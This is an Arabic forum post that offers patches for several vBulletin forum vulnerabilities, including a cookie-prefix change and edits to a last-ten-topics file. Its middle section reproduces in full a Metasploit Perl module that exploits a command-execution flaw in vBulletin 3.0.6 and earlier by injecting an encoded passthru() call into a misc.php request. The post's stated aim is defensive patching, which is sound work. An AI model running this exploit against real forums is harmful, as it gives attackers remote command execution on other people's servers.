قديم 11-11-2007, 03:36 PM   #1
-||[قلم من ذهب]||-
 
الصورة الرمزية ياعيون دلع
 
تاريخ التسجيل: Sep 2007
الدولة: فلسطين
المشاركات: 328
معدل تقييم المستوى: 13
ياعيون دلع is on a distinguished road
افتراضي بعض ثغرات المنتديات راجيه من الله الاستفاده


سوف اضع بعض ترقيع ثغرات المنتديات راجي من الله الاستفاده
والحلول طبعا منقوله من كذا موقع ......

ثغره في ملف اخر عشره مواضيع


قم بفتح ملف العشره مواضيع باسم (last10config.php) او (configlast.php)


الترقيع سهل

ابحث عن كلمة وامسحها

$fsel

وكذلك كلمة

$ftitle

انسخ الكلمه والصقها في البحث


ثم احفظ الملف وارفعه مره اخرى ...

-------------------------------------------------------


ثغره تمكنك من رفع شل على الموقع

وللترقيع

الترقيه الي اخر اصدار او الي قبله



كود:




##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the ****sploit Framework, please see
# http://****sploit.com/projects/Framework for more information.
##

package Msf::Exploit:hp_vb3_0_6;
use **** "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
'Name' => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'str0ke' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
'RPATH' => [1, 'DATA', 'Path to the misc.php ******', '/forum/misc.php'],
'SSL' => [0, 'BOOL', 'Use SSL'],
},

'De***********on' => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

'Refs' =>
[
['MIL', '832'],
],

'Payload' =>
{
'Space' => 512,
'Keys' => ['cmd', 'cmd_bash'],
},

'Keys' => ['vBulletin'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST') || $target_host;
my $path = $self->GetVar('RPATH');
my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

# Encode the command as a set of chr() function calls
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));

# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";

my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"*******-Type: application/html\r\n".
"*******-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ($s->IsError){
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}

$self->PrintLine(" Sending the malicious vBulletin Get request...");

$s->Send($req);

my $results = $s->Recv(-1, 20);
$s->Close();

return;
}

1;





وللتوضيح اكثر
الثغره في ملف

misc.php


للاهميه اخذ نسخه من الملف قبل الترقيع


------------------------------------------------------




[ثغره] بملف config.php تختص بالكوكيز

يستطيع الهكر الدخول من خلالها على بمستخدم الادمن بعد تعديل الكوكيز ..

طريقه سد الثغره كالتالي :

افتح ملف الكونفيق الي في منتداك


// Prefix that all vBulletin ******* will have
// For example
$******prefix = 'bb';

غير الحرف bb

الى اي حروف تبيها المهم غير bb

-------------------------------------------------------

منقول




[img]اضغط هنا لتكبير الصوره[/img]


ياعيون دلع غير متواجد حالياً  
 

أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة


المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
جـمـيـع الـفـتـاوي الـمـهـمـة لـلـصـائـمـيـن والـصـائـمـات $$$ الحب الخالد $$$ منتدي الخيمه الرمضانيه 6 06-10-2016 11:45 AM
مفصل دلائل النبوة $$$المجنوون$$$ منتدي السيرة النبوية والسنة المطهرة 6 04-24-2014 01:05 PM
وصف لشكل وصفات النبي الحبيب محمد عليه الصلاه والسلام يا عيون احمد منتدي السيرة النبوية والسنة المطهرة 25 03-20-2013 07:55 PM
وصف النبي صلى الله عليه وسلم وصفاته أسير الروح منتدي السيرة النبوية والسنة المطهرة 19 06-22-2012 01:16 PM


الساعة الآن 02:51 AM.


Powered by vBulletin® Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
المقالات أو المشاركات أو الآراء المنشورة في شبكة منتديات برق بأسماء أصحابها أو بأسماء مستعارة لا تمثل بالضرورة الرأي الرسمي لشبكة برق بل تمثل وجهة نظر كاتبها.